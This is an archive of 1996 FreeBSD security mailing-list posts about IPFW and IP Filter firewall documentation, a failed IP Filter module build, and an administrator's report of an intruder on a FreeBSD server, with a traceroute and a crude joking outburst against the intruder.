From owner-freebsd-security Sun Jun 23 02:12:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA14817 for security-outgoing; Sun, 23 Jun 1996 02:12:28 -0700 (PDT) Received: from uu.elvisti.kiev.ua (acc0.elvisti.kiev.ua [193.125.28.132]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA14810 for ; Sun, 23 Jun 1996 02:12:11 -0700 (PDT) Received: from office.elvisti.kiev.ua (office.elvisti.kiev.ua [193.125.28.129]) by uu.elvisti.kiev.ua (8.7.5/8.7.3) with ESMTP id MAA28546; Sun, 23 Jun 1996 12:24:15 +0300 (EET DST) Received: (from stesin@localhost) by office.elvisti.kiev.ua (8.6.12/8.ElVisti) id MAA08929; Sun, 23 Jun 1996 12:24:14 +0300 From: "Andrew V. Stesin" Message-Id: <199606230924.MAA08929@office.elvisti.kiev.ua> Subject: Re: IPFW vs. IP Filter? To: avalon@coombs.anu.edu.au (Darren Reed) Date: Sun, 23 Jun 1996 12:24:12 +0300 (EET DST) Cc: stesin@elvisti.kiev.ua, freebsd-security@FreeBSD.org In-Reply-To: <199606230504.IAA28342@office.elvisti.kiev.ua> from "Darren Reed" at Jun 23, 96 02:51:07 pm X-Mailer: ELM [version 2.4 PL24alpha5] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk # # In some mail from Andrew V. Stesin, sie said: # [...] # > 1. Sending TCP RST in reply to unsolicited TCP SYN # > didn't work. That was solved, thanks Darren, # > but I'm not 100% sure that this patch is included # > in 3.0.4 distribution. # # Just a minor nit, you can send a TCP RST in reply to any TCP packet except # one containing an RST (feedback loop :-). Thanks, I know ;) "Unsolicited SYN" I told, meaning attempt tp initiate a connedction. Or you want to say that a combo of SYN and RST might be sent to do some kind of port scanning? # > 2. With "in-kernel" version, "log body" doesn't work for # > me; I discovered the fact too late, when fighting # > with crashes of our firewall. Disabling all "log body" # > clauses in filtering rules cured that mysterious crashes, # > too, firewall is working for weeks just now, as I see. # > Now when I'm just 90% sure I found the source of trouble, # > which tortured me for weeks, probably it's time to # > go check where exactly it lives. # # Thanks, I'll have a look too. You'd probably like to check your old mail -- I sent a bunch of debugger output regarding this problem some time ago. The crash isn't easily reproducible, so if you want me to repeat my explorations, please let me know -- I'll try once again. # Darren # Thanks for the nice tool, Darren! BTW -- will it be a a bugfix 3.0.5 version, or your'e working on a new release only? (Now when I got a box at home, and moved to -FreeBSD-current, I'm going to check IPfilter with -current, so should I go with a new version?) -- With best regards -- Andrew Stesin. +380 (44) 2760188 +380 (44) 2713457 +380 (44) 2713560 "You may delegate authority, but not responsibility." Frank's Management Rule #1. From owner-freebsd-security Sun Jun 23 05:46:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA24445 for security-outgoing; Sun, 23 Jun 1996 05:46:29 -0700 (PDT) Received: from palmer.demon.co.uk (palmer.demon.co.uk [158.152.50.150]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id FAA24427 for ; Sun, 23 Jun 1996 05:45:09 -0700 (PDT) Received: from palmer.demon.co.uk (localhost [127.0.0.1]) by palmer.demon.co.uk (sendmail/PALMER-2) with ESMTP id NAA23933 for ; Sun, 23 Jun 1996 13:42:58 +0100 (BST) Prev-Resent: Sun, 23 Jun 1996 13:42:56 +0100 Prev-Resent: "security@freebsd.org " Received: from punt.demon.co.uk (punt.demon.co.uk [158.152.1.73]) by palmer.demon.co.uk (sendmail/PALMER-2) with SMTP id UAA19600 for ; Sat, 22 Jun 1996 20:48:21 +0100 (BST) Received: from punt-1.mail.demon.net by mailstore for gary@palmer.demon.co.uk id 835472615:02148:0; Sat, 22 Jun 96 20:43:35 BST Received: from ceres.brunel.ac.uk ([134.83.176.3]) by punt-1.mail.demon.net id ac01655; 22 Jun 96 20:42 +0100 Received: from freefall.freebsd.org by ceres.brunel.ac.uk with SMTP (PP); Sat, 22 Jun 1996 20:39:28 +0100 Received: from zen.nash.org (nash.pr.mcs.net [204.95.47.72]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA04608 for ; Sat, 22 Jun 1996 12:39:23 -0700 (PDT) Received: (from alex@localhost) by zen.nash.org (8.7.5/8.6.12) id OAA12916; Sat, 22 Jun 1996 14:38:52 -0500 (CDT) Date: Sat, 22 Jun 1996 14:38:52 -0500 (CDT) Message-Id: <199606221938.OAA12916@zen.nash.org> From: Alex Nash To: gpalmer@FreeBSD.ORG Cc: taob@io.org Subject: freebsd-security@FreeBSD.org Reply-to: nash@mcs.com Resent-To: security@FreeBSD.ORG Resent-Date: Sun, 23 Jun 1996 13:42:57 +0100 Resent-Message-ID: <23931.835533777@palmer.demon.co.uk> Resent-From: Gary Palmer Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > I'm setting up a FreeBSD-based firewall here, and my original plan > > was to go with IPFW in the kernel. However, it seems there isn't any > > recent documentation for it (both the man page and the handbook entry > > are out of date). > > I thought Alex Nash recently updated both? Have you tried our WWW > pages to get the latest version? :( Unfortunately not. When I submitted my ipfw changes into -current, my understanding was that 2.1.5 was about 2 weeks from being solidified. The dilemma was whether I should risk bringing in mass changes into -stable. After discussing this with Poul, I decided against doing so. -stable has all the latest bug fixes, but lacks the updated documentation. I'm sitting on some handbook changes because I didn't want the handbook to *seem* up to date, but really only cover -current. If anyone has suggestions on where we should take -stable, I'd be happy to hear them. If it looks like 2.1.5 will be delayed long enough, we can see about bringing -stable up to the level of -current. Alex From owner-freebsd-security Sun Jun 23 08:44:34 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA03881 for security-outgoing; Sun, 23 Jun 1996 08:44:34 -0700 (PDT) Received: from rocky.sri.MT.net (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA03876; Sun, 23 Jun 1996 08:44:31 -0700 (PDT) Received: (from nate@localhost) by rocky.sri.MT.net (8.6.12/8.6.12) id JAA18001; Sun, 23 Jun 1996 09:44:16 -0600 Date: Sun, 23 Jun 1996 09:44:16 -0600 From: Nate Williams Message-Id: <199606231544.JAA18001@rocky.sri.MT.net> To: nash@mcs.com Cc: freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org Subject: Re: IPFW documentation In-Reply-To: <199606221938.OAA12916@zen.nash.org> References: <199606221938.OAA12916@zen.nash.org> Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Alex Nash writes: > > > I'm setting up a FreeBSD-based firewall here, and my original plan > > > was to go with IPFW in the kernel. However, it seems there isn't any > > > recent documentation for it (both the man page and the handbook entry > > > are out of date). > > > > I thought Alex Nash recently updated both? Have you tried our WWW > > pages to get the latest version? > > :( Unfortunately not. When I submitted my ipfw changes into -current, > my understanding was that 2.1.5 was about 2 weeks from being solidified. > The dilemma was whether I should risk bringing in mass changes into > -stable. After discussing this with Poul, I decided against doing so. I *sort of* agree. The problem is that both the man pages and the documentation we have is *wrong* and out of date. There have been *many* changes made to both the kernel and user-land code, but there has been *NO* documentation of it. >From /sys/netinet/ip_fw.c revision 1.14.4.7 date: 1996/05/06 20:32:01; author: phk; state: Exp; lines: +18 -14 Merge from head. >From ipfw.8 revision 1.7.4.6 date: 1996/02/26 15:26:59; author: phk; state: Exp; lines: +194 -29 Update to lates reality. We've got a problem here. I consider this a *bug*, and a critical one at that, especially given our potential customer base. The people most likely to use 2.1.5 are ISP's and such, who have both a need and a desire for the functionality of IPFW. > -stable has all the latest bug fixes, but lacks the updated > documentation. I'm sitting on some handbook changes because I didn't > want the handbook to *seem* up to date, but really only cover -current. What about the man-pages & the stuff in /etc? Are they correct and up to date? Even if the handbook stuff isn't correct, the on-line stuff should at least be somewhat correct. > If anyone has suggestions on where we should take -stable, I'd be > happy to hear them. If it looks like 2.1.5 will be delayed long > enough, we can see about bringing -stable up to the level of -current. We have until Tuesday to get things at least somewhat 'sane'. Please can you take the time to document what exists in -stable!?!? Nate From owner-freebsd-security Sun Jun 23 09:07:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA05224 for security-outgoing; Sun, 23 Jun 1996 09:07:39 -0700 (PDT) Received: from zen.nash.org (nash.pr.mcs.net [204.95.47.72]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA05215; Sun, 23 Jun 1996 09:07:34 -0700 (PDT) Received: (from alex@localhost) by zen.nash.org (8.7.5/8.6.12) id LAA07941; Sun, 23 Jun 1996 11:05:36 -0500 (CDT) Date: Sun, 23 Jun 1996 11:05:36 -0500 (CDT) Message-Id: <199606231605.LAA07941@zen.nash.org> From: Alex Nash To: nate@sri.MT.net Cc: freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org Subject: Re: IPFW documentation Reply-to: nash@mcs.com Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > :( Unfortunately not. When I submitted my ipfw changes into -current, > > my understanding was that 2.1.5 was about 2 weeks from being solidified. > > The dilemma was whether I should risk bringing in mass changes into > > -stable. After discussing this with Poul, I decided against doing so. > > I *sort of* agree. The problem is that both the man pages and the > documentation we have is *wrong* and out of date. There have been > *many* changes made to both the kernel and user-land code, but there > has been *NO* documentation of it. > > >From /sys/netinet/ip_fw.c > revision 1.14.4.7 > date: 1996/05/06 20:32:01; author: phk; state: Exp; lines: +18 -14 > Merge from head. > > >From ipfw.8 > revision 1.7.4.6 > date: 1996/02/26 15:26:59; author: phk; state: Exp; lines: +194 -29 > Update to lates reality. > > We've got a problem here. > > I consider this a *bug*, and a critical one at that, especially given > our potential customer base. The people most likely to use 2.1.5 are > ISP's and such, who have both a need and a desire for the functionality > of IPFW. I agree with your last statement 100% (in fact this came up in my discussion with Poul). But since I didn't know exactly when -stable would freeze, I was very concerned that I might introduce a problem that would end up getting shipped in 2.1.5. In retrospect, I should have bit the bullet and just done it. > > -stable has all the latest bug fixes, but lacks the updated > > documentation. I'm sitting on some handbook changes because I didn't > > want the handbook to *seem* up to date, but really only cover -current. > > What about the man-pages & the stuff in /etc? Are they correct and up > to date? Even if the handbook stuff isn't correct, the on-line stuff > should at least be somewhat correct. No argument here :) > > If anyone has suggestions on where we should take -stable, I'd be > > happy to hear them. If it looks like 2.1.5 will be delayed long > > enough, we can see about bringing -stable up to the level of -current. > > We have until Tuesday to get things at least somewhat 'sane'. Please > can you take the time to document what exists in -stable!?!? You bet. How about this: - Bring src/sys/netinet/ip_fw.c up to -current level (or very close to). - Bring src/sbin/ipfw/ipfw.c in line with the kernel changes. - Try and get the man page in shape (the version in -current is a lot closer, but not perfect). (The handbook may have to lag a bit, sorry :( ) When this is done, I'll announce where patches can be found so that as many people as possible can bang on it to make sure it's ok. That'll give me the comfort level I'd need to place these changes into 2.1.5. Does this sound viable? Alex From owner-freebsd-security Sun Jun 23 11:27:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA12874 for security-outgoing; Sun, 23 Jun 1996 11:27:56 -0700 (PDT) Received: from rocky.sri.MT.net (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA12864; Sun, 23 Jun 1996 11:27:51 -0700 (PDT) Received: (from nate@localhost) by rocky.sri.MT.net (8.6.12/8.6.12) id MAA18224; Sun, 23 Jun 1996 12:27:46 -0600 Date: Sun, 23 Jun 1996 12:27:46 -0600 From: Nate Williams Message-Id: <199606231827.MAA18224@rocky.sri.MT.net> To: nash@mcs.com Cc: nate@sri.MT.net, freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org Subject: Re: IPFW documentation In-Reply-To: <199606231605.LAA07941@zen.nash.org> References: <199606231605.LAA07941@zen.nash.org> Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > We have until Tuesday to get things at least somewhat 'sane'. Please > > can you take the time to document what exists in -stable!?!? > > You bet. How about this: > > - Bring src/sys/netinet/ip_fw.c up to -current level (or very > close to). > > - Bring src/sbin/ipfw/ipfw.c in line with the kernel changes. > > - Try and get the man page in shape (the version in -current is > a lot closer, but not perfect). It works for me, but I'm not expert on any of it. However, when I upgrade my box from 2.1R -> 2.1.5 I will want to know what has changed. Unfortunately, I can't do that for at least another 2 weeks since I'm upgrading everything else this week and am taking time off the week after. > When this is done, I'll announce where patches can be found so that as > many people as possible can bang on it to make sure it's ok. Patches for what? I don't think you'll get enough time to get it reviewed and in before Tuesday, but if you think it can be done go for it. In any case, the docs and the source should match by the time 2.1.5 is rolled. > That'll > give me the comfort level I'd need to place these changes into 2.1.5. > Does this sound viable? As long as everythign is in sync. I don't mind. I'd prefer backing out the new stuff completely out if we can't keep the sources and docs in sync, since the only thing worse than buggy code is code that's documented incorrectly. Nate From owner-freebsd-security Sun Jun 23 12:37:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA16542 for security-outgoing; Sun, 23 Jun 1996 12:37:49 -0700 (PDT) Received: from zen.nash.org (nash.pr.mcs.net [204.95.47.72]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA16531; Sun, 23 Jun 1996 12:37:44 -0700 (PDT) Received: (from alex@localhost) by zen.nash.org (8.7.5/8.6.12) id OAA00300; Sun, 23 Jun 1996 14:35:46 -0500 (CDT) Date: Sun, 23 Jun 1996 14:35:46 -0500 (CDT) Message-Id: <199606231935.OAA00300@zen.nash.org> From: Alex Nash To: nate@sri.MT.net Cc: freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org Subject: Re: IPFW documentation Reply-to: nash@mcs.com Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > You bet. How about this: > > > > - Bring src/sys/netinet/ip_fw.c up to -current level (or very > > close to). > > > > - Bring src/sbin/ipfw/ipfw.c in line with the kernel changes. > > > > - Try and get the man page in shape (the version in -current is > > a lot closer, but not perfect). > > It works for me, but I'm not expert on any of it. However, when I > upgrade my box from 2.1R -> 2.1.5 I will want to know what has changed. > Unfortunately, I can't do that for at least another 2 weeks since I'm > upgrading everything else this week and am taking time off the week > after. I'm not sure how much I can help with the differences, but I guess I would summarize the main differences as: - The default policy is now deny (previously it was allow) - The syntax of ipfw has changed substantially (see ipfw(8) for details) > > When this is done, I'll announce where patches can be found so that as > > many people as possible can bang on it to make sure it's ok. > > Patches for what? I don't think you'll get enough time to get it > reviewed and in before Tuesday, but if you think it can be done go for > it. In any case, the docs and the source should match by the time 2.1.5 > is rolled. In between writing the first message and this one I've merged -stable with -current and am running it at this moment. The main advantages are: - Better error messages, usage output, etc. - Slightly more intuitive (accepts host names, for example) - New features (yes, this can be viewed as a reason *not* to include it in -release, but a I haven't heard any complaints about the code in -current yet) - Updated man page (we can use the one in current) I need to tie up a few loose ends, and then I'll post patches so that it can be reviewed by all. > > That'll > > give me the comfort level I'd need to place these changes into 2.1.5. > > Does this sound viable? > > As long as everythign is in sync. I don't mind. I'd prefer backing out > the new stuff completely out if we can't keep the sources and docs in > sync, since the only thing worse than buggy code is code that's > documented incorrectly. I'm not going to touch backing out of the new stuff, that would be Poul's decision. If the current ipfw implementation stays, I think it would be worthwhile to try and incorporate the most recent man page and cosmetic/convenience fixes to ipfw. To make this happen though, we need reviewers. Any volunteers? :) Alex From owner-freebsd-security Sun Jun 23 15:09:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA27265 for security-outgoing; Sun, 23 Jun 1996 15:09:41 -0700 (PDT) Received: from rocky.sri.MT.net (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA27256; Sun, 23 Jun 1996 15:09:35 -0700 (PDT) Received: (from nate@localhost) by rocky.sri.MT.net (8.6.12/8.6.12) id QAA18682; Sun, 23 Jun 1996 16:09:30 -0600 Date: Sun, 23 Jun 1996 16:09:30 -0600 From: Nate Williams Message-Id: <199606232209.QAA18682@rocky.sri.MT.net> To: nash@mcs.com Cc: nate@sri.MT.net, freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org Subject: Re: IPFW documentation In-Reply-To: <199606231935.OAA00300@zen.nash.org> References: <199606231935.OAA00300@zen.nash.org> Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > In between writing the first message and this one I've merged -stable > with -current and am running it at this moment. The main advantages > are: > > - Better error messages, usage output, etc. > > - Slightly more intuitive (accepts host names, for example) > > - New features (yes, this can be viewed as a reason *not* to include > it in -release, but a I haven't heard any complaints about the > code in -current yet) > > - Updated man page (we can use the one in current) > > I need to tie up a few loose ends, and then I'll post patches so that > it can be reviewed by all. I hope we get reviewers, but if you don't I'd still bring it into -stable since you've given 'fair notice'. > > As long as everythign is in sync. I don't mind. I'd prefer backing out > > the new stuff completely out if we can't keep the sources and docs in > > sync, since the only thing worse than buggy code is code that's > > documented incorrectly. > > I'm not going to touch backing out of the new stuff, that would be > Poul's decision. If the current ipfw implementation stays, I think > it would be worthwhile to try and incorporate the most recent man page > and cosmetic/convenience fixes to ipfw. To make this happen though, > we need reviewers. Any volunteers? :) If the current ipfw implemenations stays it *must* have correct documentation, or else it should be backed out. I prefer the former, but I have no time to test it. Nate From owner-freebsd-security Sun Jun 23 16:01:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA00278 for security-outgoing; Sun, 23 Jun 1996 16:01:04 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA00270 for ; Sun, 23 Jun 1996 16:00:59 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id SAA04886; Sun, 23 Jun 1996 18:53:39 -0400 (EDT) Date: Sun, 23 Jun 1996 18:54:36 -0400 (EDT) From: Brian Tao To: "Andrew V. Stesin" cc: Darren Reed , freebsd-security@FreeBSD.org Subject: Re: IPFW vs. IP Filter? In-Reply-To: <199606222305.CAA15185@office.elvisti.kiev.ua> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Andrew V. Stesin wrote: > > Building IPfilter. Generally the instructions worked for me; > I did minor modifications to the makefiles to suit my local > needs. Than cd FreeBSD; kinstall; cd BSD; make all install > was the correct sequence, I recall. According to INSTALL.xBSD: >>>>> To build a kernel for use with the loadable kernel module, follow these steps: 1. do "make bsd" 2. cd to the "BSD" directory and type "make install" 3. run "4bsd/minstall" as root 4. build a new kernel [...] <<<<< I can't get past the "make bsd" part: # make bsd [...] gcc -I. -Wall -O -pipe -I.. -DIPFILTER_LKM -DIPFILTER_LOG -D`uname -m` -DINET -DKERNEL -D_KERNEL -I/usr/include -I/sys -I/sys/sys -I/sys/arch -DIPL_NAME=\"/dev/ipl\" -c ../mln_ipl.c -o ml_ipl.o In file included from /usr/include/sys/conf.h:224, from ../mln_ipl.c:14: /usr/include/machine/conf.h:6: ioconf.h: No such file or directory ../mln_ipl.c:74: warning: initialization from incompatible pointer type ../mln_ipl.c:76: warning: initialization from incompatible pointer type ../mln_ipl.c:77: warning: initialization from incompatible pointer type ../mln_ipl.c:78: warning: initialization from incompatible pointer type ../mln_ipl.c:79: warning: initialization from incompatible pointer type ../mln_ipl.c:80: warning: initialization from incompatible pointer type ../mln_ipl.c:86: parse error before string constant ../mln_ipl.c:86: parse error before string constant ../mln_ipl.c:86: warning: missing braces around initializer for `IPL_VERSION_module.lkm_dev' ../mln_ipl.c:89: conflicting types for `cdevsw' /usr/include/sys/conf.h:122: previous declaration of `cdevsw' ../mln_ipl.c: In function `ipl_load': ../mln_ipl.c:175: warning: suggest parentheses around assignment used as truth value ../mln_ipl.c: In function `xxxinit': ../mln_ipl.c:199: `_module' undeclared (first use this function) ../mln_ipl.c:199: (Each undeclared identifier is reported only once ../mln_ipl.c:199: for each function it appears in.) ../mln_ipl.c: At top level: ../mln_ipl.c:86: warning: `IPL_VERSION_module' defined but not used *** Error code 1 Stop. *** Error code 1 Stop. Do I have to unpack the source somewhere in the kernel source tree? ioconf.h only exists in the /sys/compile/[...] directories. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Sun Jun 23 16:07:30 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA00824 for security-outgoing; Sun, 23 Jun 1996 16:07:30 -0700 (PDT) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA00816 for ; Sun, 23 Jun 1996 16:07:27 -0700 (PDT) Message-Id: <199606232307.QAA00816@freefall.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA135771079; Mon, 24 Jun 1996 09:04:39 +1000 From: Darren Reed Subject: Re: IPFW vs. IP Filter? To: taob@io.org (Brian Tao) Date: Mon, 24 Jun 1996 09:04:39 +1000 (EST) Cc: stesin@elvisti.kiev.ua, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.org In-Reply-To: from "Brian Tao" at Jun 23, 96 06:54:36 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk In some mail from Brian Tao, sie said: > > On Sun, 23 Jun 1996, Andrew V. Stesin wrote: > > > > Building IPfilter. Generally the instructions worked for me; > > I did minor modifications to the makefiles to suit my local > > needs. Than cd FreeBSD; kinstall; cd BSD; make all install > > was the correct sequence, I recall. > > According to INSTALL.xBSD: > > > >>>>> > To build a kernel for use with the loadable kernel module, follow > these steps: > > 1. do "make bsd" > > 2. cd to the "BSD" directory and type "make install" > > 3. run "4bsd/minstall" as root > > 4. build a new kernel > [...] > <<<<< > > I can't get past the "make bsd" part: > > # make bsd [...] > Stop. > *** Error code 1 > > Stop. > > Do I have to unpack the source somewhere in the kernel source > tree? ioconf.h only exists in the /sys/compile/[...] directories. It don't expect it will compile on FreeBSD-current (2.2). They changed a lot of that part of the kernel and if nobody else does the patches before I do, I'll do it when I have a 2.2-RELEASE CD-ROM to install from. Darren From owner-freebsd-security Sun Jun 23 17:11:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA05469 for security-outgoing; Sun, 23 Jun 1996 17:11:55 -0700 (PDT) Received: from irbs.irbs.com ([199.182.75.129]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA05464 for ; Sun, 23 Jun 1996 17:11:51 -0700 (PDT) Received: (from jc@localhost) by irbs.irbs.com (8.7.5/8.6.6) id UAA16450; Sun, 23 Jun 1996 20:09:09 -0400 (EDT) From: John Capo Message-Id: <199606240009.UAA16450@irbs.irbs.com> Subject: Re: IPFW vs. IP Filter? To: taob@io.org (Brian Tao) Date: Sun, 23 Jun 1996 20:09:08 -0400 (EDT) Cc: stesin@elvisti.kiev.ua, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.ORG In-Reply-To: from Brian Tao at "Jun 23, 96 06:54:36 pm" X-Mailer: ELM [version 2.4ME+ PL11 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Brian Tao writes: > > Do I have to unpack the source somewhere in the kernel source > tree? ioconf.h only exists in the /sys/compile/[...] directories. Much work needed to run it on 2.2. I can provide patches for kernel install if you like. John Capo jc@irbs.com IRBS Engineering FreeBSD Servers and Workstations (954) 792-9551 Unix/Internet Consulting - ISP Solutions From owner-freebsd-security Sun Jun 23 17:26:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA06468 for security-outgoing; Sun, 23 Jun 1996 17:26:01 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA06461; Sun, 23 Jun 1996 17:25:59 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id RAA07981; Sun, 23 Jun 1996 17:25:35 -0700 (PDT) To: hackers@freebsd.org cc: security@freebsd.org, ache@freebsd.org Subject: I need help on this one - please help me track this guy down! Date: Sun, 23 Jun 1996 17:25:35 -0700 Message-ID: <7979.835575935@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk jkh p2 a235.pu.ru Sun04PM - -bash (bash) This was "me" on wcarchive.cdrom.com today - when I caught the guy I starred myself out of the password file and `watch -W'd' him. He wasn't doing anything special, but when I sent him a "gotcha!" he attempted to remove my home directory (nothing in it, no loss) and logged out. That proves this guy to not only be a cracker but a malicious one at that and, were he to be caught and relieved of his testicles by the russian mafia, I would be the first to ask for them in a jar as a momento! :-) I'm not one to generally get too upset about this kind of thing, but breaking into our flagship machine as me is going just a bit too far (as was trying to nuke my files when caught - I'd have forgiven him but for that, now I want his balls). A traceroute from wcarchive doesn't show me much, but if anybody can gleen some userful information out of it I'd appreciate it. Thanks! 5 Helsinki2.FI.EU.net (134.222.228.45) 555.687 ms 518.720 ms 507.602 ms 6 StPetersburg.RU.EU.net (134.222.23.2) 549.172 ms 592.407 ms 630.928 ms 7 spb-2-gw.spb.su (193.124.83.66) 547.190 ms 573.518 ms 569.656 ms 8 hqlgu-LE.pu.ru (193.124.255.134) 519.318 ms 657.805 ms 651.496 ms 9 slip-0.pu.ru (193.124.85.1) 840.489 ms 671.729 ms 650.750 ms 10 nat.pu.ru (193.124.85.134) 638.649 ms 653.720 ms 720.170 ms 11 gw.pu.ru (193.124.85.219) 752.144 ms 645.046 ms 641.413 ms 12 localhost (127.0.0.1) 670.113 ms 702.233 ms 695.733 ms ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Interesting! Jordan From owner-freebsd-security Sun Jun 23 18:02:33 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA08392 for security-outgoing; Sun, 23 Jun 1996 18:02:33 -0700 (PDT) Received: from rah.star-gate.com (rah.star-gate.com [204.188.121.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA08385; Sun, 23 Jun 1996 18:02:29 -0700 (PDT) Received: from rah.star-gate.com (localhost.v-site.net [127.0.0.1]) by rah.star-gate.com (8.7.5/8.7.3) with ESMTP id SAA01723; Sun, 23 Jun 1996 18:02:19 -0700 (PDT) Message-Id: <199606240102.SAA01723@rah.star-gate.com> X-Mailer: exmh version 1.6.5 12/11/95 To: "Jordan K. Hubbard" cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 17:25:35 PDT." <7979.835575935@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 23 Jun 1996 18:02:18 -0700 From: Amancio Hasty Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Try to use ssh so that your password and session are encrypted . This will make further "crack" attempts a bit more difficult. Amancio >From The Desk Of "Jordan K. Hubbard" : > jkh p2 a235.pu.ru Sun04PM - -bash (bash) > > This was "me" on wcarchive.cdrom.com today - when I caught the guy I > starred myself out of the password file and `watch -W'd' him. He > wasn't doing anything special, but when I sent him a "gotcha!" he > attempted to remove my home directory (nothing in it, no loss) and > logged out. That proves this guy to not only be a cracker but a > malicious one at that and, were he to be caught and relieved of his > testicles by the russian mafia, I would be the first to ask for them > in a jar as a momento! :-) > > I'm not one to generally get too upset about this kind of thing, but > breaking into our flagship machine as me is going just a bit too far > (as was trying to nuke my files when caught - I'd have forgiven him > but for that, now I want his balls). > > A traceroute from wcarchive doesn't show me much, but if anybody can > gleen some userful information out of it I'd appreciate it. > > Thanks! > > 5 Helsinki2.FI.EU.net (134.222.228.45) 555.687 ms 518.720 ms 507.602 ms > 6 StPetersburg.RU.EU.net (134.222.23.2) 549.172 ms 592.407 ms 630.928 ms > 7 spb-2-gw.spb.su (193.124.83.66) 547.190 ms 573.518 ms 569.656 ms > 8 hqlgu-LE.pu.ru (193.124.255.134) 519.318 ms 657.805 ms 651.496 ms > 9 slip-0.pu.ru (193.124.85.1) 840.489 ms 671.729 ms 650.750 ms > 10 nat.pu.ru (193.124.85.134) 638.649 ms 653.720 ms 720.170 ms > 11 gw.pu.ru (193.124.85.219) 752.144 ms 645.046 ms 641.413 ms > 12 localhost (127.0.0.1) 670.113 ms 702.233 ms 695.733 ms > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > Interesting! > > Jordan > From owner-freebsd-security Sun Jun 23 18:09:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA09014 for security-outgoing; Sun, 23 Jun 1996 18:09:36 -0700 (PDT) Received: from dhp.com (dhp.com [199.245.105.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA08963; Sun, 23 Jun 1996 18:09:25 -0700 (PDT) 